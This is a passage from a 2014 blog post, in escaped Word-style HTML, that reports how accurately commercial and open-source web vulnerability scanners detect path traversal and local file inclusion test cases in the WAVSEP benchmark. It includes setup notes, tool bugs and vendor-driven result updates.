&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Many scanners had a difficult time locating a variety of
traversal test cases in 2012, but this time, the results show a &lt;b&gt;significant&lt;/b&gt;
improvement in the results of many of the tools, proving that many vendors
invested major efforts in improving their products.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align=&quot;left&quot; dir=&quot;ltr&quot;&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;background: #000000; border-collapse: collapse; border: none; mso-background-themecolor: accent1; mso-background-themetint: 102; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;
 &lt;tbody&gt;
&lt;tr&gt;
  &lt;td style=&quot;border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 426.1pt;&quot; valign=&quot;top&quot; width=&quot;568&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Path Traversal vs. Local File Inclusion – Reminder&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;As I explained in the past, the reason Path Traversal was
  tagged along with Local File Inclusion (LFI) is simple - many scanners don&#39;t
  make the differentiation between inclusion and traversal, and furthermore, a
  few online vulnerability documentation sources do. In addition, the results
  obtained from the tests performed on the vast majority of tools lead to the
  same conclusion - many plugins listed under the name LFI detected the path
  traversal test cases.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;While implementing the path traversal test cases in 2012 and
  consuming nearly every relevant piece of documentation I could find on the
  subject, I decided to take the current path, in spite of some acute
  differences some of the documentation sources suggested (although I did
  implemented an infrastructure in WAVSEP for &quot;true&quot; inclusion
  exposures).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The point is &lt;b&gt;not&lt;/b&gt; to get into a discussion of
  whether or not path traversal, directory traversal and local file inclusion
  should be classified as the same vulnerability, but simply to explain why in
  spite of the differences some organizations / classification methods have for
  these exposures, they were listed under the same name.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The evaluation was performed on a &lt;b&gt;WAVSEP v1.2&lt;/b&gt;
  instance that was hosted on a windows XP VM, and although there are specific
  test cases meant to emulate servers that are running with a low privileged OS
  user accounts (using the servlet context file access method), many of the
  test cases emulate web servers that are running with administrative user
  accounts.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;[Note - in addition to the wavsep installation, to produce
  identical results to those of this benchmark, a file by the name of
  content.ini must be placed in the root installation directory of the tomcat
  server- which is different than the root directory of the web server.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;It’s also crucial to install WAVSEP on windows, and run
  the tomcat server with administrative privileges, as some of the test cases
  rely on windows-specific paths or require access to directories outside of
  the web server scope]&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;In order to assess the detection accuracy of different path
traversal instances, I used a total of &lt;b&gt;816&lt;/b&gt; path traversal test cases,
and a bunch of false positive test cases as well. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The comparison of the scanners&#39; path traversal detection
accuracy is documented in detail in the following section of sectoolmarket:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;a href=&quot;http://sectoolmarket.com/path-traversal-local-file-inclusion-detection-accuracy-unified-list.html&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;http://sectoolmarket.com/path-traversal-local-file-inclusion-detection-accuracy-unified-list.html&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Note:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;During the testing of the development version of &lt;b&gt;W3AF&lt;/b&gt;
(the latest stable I could get was 1.2 which was tested in 2012, and the
current development version was 1.6+) I experienced several bugs, specifically
bugs that prevented the scanner from scanning HTML forms submitted using HTTP
POST (or in short, POST parameters).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;One of these bugs was related to the LFI/Path Traversal
detection plugin, &lt;b&gt;which caused the scan to crash&lt;/b&gt; whenever it was used,
after detecting only a few vulnerable test cases.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;I tried various methods to overcome that bug artificially,
but failed to do so, so I was not able to obtain the actual results of the
latest version of W3AF, and thus, &lt;b&gt;decided to use the results from the
previous benchmark&lt;/b&gt; to represent it&#39;s score.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The bugs were reported to the project leader, and hopefully,
will be fixed in the future.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;I had similar issues trying to use the various LFI/RFI
plugins of &lt;b&gt;Qualys&lt;/b&gt;, and unfortunately, wasn&#39;t able to overcome them and
get an actual score by the publication of this benchmark (which is why Qualys
is absent from the LFI/RFI charts). I&#39;m currently not sure if the reason is a
bug in product or in the configuration used during my testing process.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Result Chart Glossary&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Note that the&amp;nbsp;&lt;b&gt;&lt;span style=&quot;color: #38761d;&quot;&gt;GREEN&lt;/span&gt;&lt;span style=&quot;color: #0070c0;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;bar represents the vulnerable test case
detection accuracy, while the&amp;nbsp;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;RED&lt;/span&gt;&amp;nbsp;&lt;/b&gt;bar
represents false positive&amp;nbsp;&lt;u&gt;categories&lt;/u&gt;&amp;nbsp;detected by the tool
(which may result in more instances then what the bar actually presents, when
compared to the detection accuracy bar).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;i style=&quot;font-weight: bold;&quot;&gt;&lt;u&gt;Result Update (29/03/2014):&lt;/u&gt;&lt;/i&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-family: Georgia, Times New Roman, serif;&quot;&gt;The results of arachni were improved from 30.88% to&amp;nbsp;&lt;b&gt;100%&lt;/b&gt;&amp;nbsp;(!!!) according to vendor recommendations provided&amp;nbsp;&lt;b&gt;AFTER&amp;nbsp;&lt;/b&gt;the original benchmark publication, by using the source code disclosure plugin, in addition to the local file inclusion and path traversal plugins, after verifying that the plugin behavior is relevant to the exposure (the name may deceive), and while using the same version.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: 12pt;&quot;&gt;&lt;span style=&quot;font-family: Georgia, Times New Roman, serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Georgia, Times New Roman, serif;&quot;&gt;&lt;span style=&quot;font-size: 12pt;&quot;&gt;The result of &lt;/span&gt;&lt;b style=&quot;font-size: 12pt;&quot;&gt;Webinspect &lt;/b&gt;&lt;span style=&quot;font-size: 12pt;&quot;&gt;were likewise&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;font-size: 12pt;&quot;&gt;improved &lt;/b&gt;&lt;span style=&quot;font-size: 12pt;&quot;&gt;from 72.06% to&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;font-size: 12pt;&quot;&gt;91.18%&amp;nbsp;&lt;/b&gt;&lt;span style=&quot;font-size: 12pt;&quot;&gt;by using a custom configuration provided by the vendor &lt;/span&gt;&lt;b style=&quot;font-size: 12pt;&quot;&gt;AFTER&lt;/b&gt;&lt;span style=&quot;font-size: 12pt;&quot;&gt;&amp;nbsp;the original benchmark publication, using the same tested version, which included the following plugins:&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Georgia, Times New Roman, serif;&quot;&gt;&amp;nbsp; i. &amp;nbsp; &amp;nbsp; &amp;nbsp; 10287 – Local File Include&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Georgia, Times New Roman, serif;&quot;&gt;&amp;nbsp; ii. &amp;nbsp; &amp;nbsp; &amp;nbsp;10271 – Local File Inclusion/Reading Vulnerability&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Georgia, Times New Roman, serif;&quot;&gt;&amp;nbsp; iii. &amp;nbsp; &amp;nbsp; 10272 – Possible Local File Inclusion/Reading Vulnerability&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Georgia, Times New Roman, serif;&quot;&gt;&amp;nbsp; iv. &amp;nbsp; &amp;nbsp; 11327 – LFI Tomcat&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Georgia, Times New Roman, serif;&quot;&gt;&amp;nbsp; v. &amp;nbsp; &amp;nbsp; &amp;nbsp;11332 – LFI IIS&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The Path Traversal / LFI Detection Accuracy of Commercial /SAAS
Scanners&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp79e1YNEvUuPoCbaTI3aIaIVXpRMFNkZXWlxYJWbyOPHIb34rLXkNg1BHLbw3QGvl1B685BqC8s5h6BkK2RC6Qxt_-y9pa3oIiPxgxtTB-AejG2jYaSAKQry5EGcoJiPs3WdskquNgqw/s1600/LFI-wavsep-results-2014-commercial.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp79e1YNEvUuPoCbaTI3aIaIVXpRMFNkZXWlxYJWbyOPHIb34rLXkNg1BHLbw3QGvl1B685BqC8s5h6BkK2RC6Qxt_-y9pa3oIiPxgxtTB-AejG2jYaSAKQry5EGcoJiPs3WdskquNgqw/s1600/LFI-wavsep-results-2014-commercial.png&quot; height=&quot;296&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12pt;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The Path Traversal / LFI Detection Accuracy of Opensource
/Free Scanners&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyVXqyFjSuCyuIbN4YTnvts3rOe0F0Uwzk-76iOLAT_FSxXt1EwiT9XJx7dmMFM-s2-o-GcNJCGGQjvVukFoiw8R7qsuxGbeRJJ0m9e1VODLF-x7Zdj8sEwdNQxd1dxAq8yTRWLpTcdrQ/s1600/LFI-wavsep-results-2014-opensource.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyVXqyFjSuCyuIbN4YTnvts3rOe0F0Uwzk-76iOLAT_FSxXt1EwiT9XJx7dmMFM-s2-o-GcNJCGGQjvVukFoiw8R7qsuxGbeRJJ0m9e1VODLF-x7Zdj8sEwdNQxd1dxAq8yTRWLpTcdrQ/s1600/LFI-wavsep-results-2014-opensource.png&quot; height=&quot;234&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-no-proof: yes;&quot;&gt;&lt;!--[if gte vml 1]&gt;&lt;v:shape id=&quot;Picture_x0020_30&quot;
 o:spid=&quot;_x0000_i1045&quot; type=&quot;#_x0000_t75&quot; style=&#39;width:414.75pt;height:168.75pt;
 visibility:visible;mso-wrap-style:square&#39;&gt;
 &lt;v:imagedata src=&quot;file:///C:\Users\SHAY~1.CHE\AppData\Local\Temp\msohtmlclip1\01\clip_image042.png&quot;
  o:title=&quot;&quot;/&gt;
&lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;!--[endif]--&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The Path Traversal / LFI Detection Accuracy of Scanners –
Unified List&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKxfvcBFnnFs7ATA0j80Xqsif1V1Mynd69kOuusaGU1u0FWOjoQpfmocWTJO4Ca9DOuYdnmGzgEnW3MWNPwFaTXrxOko4BD83BiJRDvv1pEn9HDTfCbGYG2mJsWvBc0gbJz1lxcHq7dwM/s1600/LFI-wavsep-results-2014-unified.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKxfvcBFnnFs7ATA0j80Xqsif1V1Mynd69kOuusaGU1u0FWOjoQpfmocWTJO4Ca9DOuYdnmGzgEnW3MWNPwFaTXrxOko4BD83BiJRDvv1pEn9HDTfCbGYG2mJsWvBc0gbJz1lxcHq7dwM/s1600/LFI-wavsep-results-2014-unified.png&quot; height=&quot;466&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-no-proof: yes;&quot;&gt;&lt;!--[if gte vml 1]&gt;&lt;v:shape id=&quot;Picture_x0020_31&quot;
 o:spid=&quot;_x0000_i1044&quot; type=&quot;#_x0000_t75&quot; style=&#39;width:415.5pt;height:346.5pt;
 visibility:visible;mso-wrap-style:square&#39;&gt;
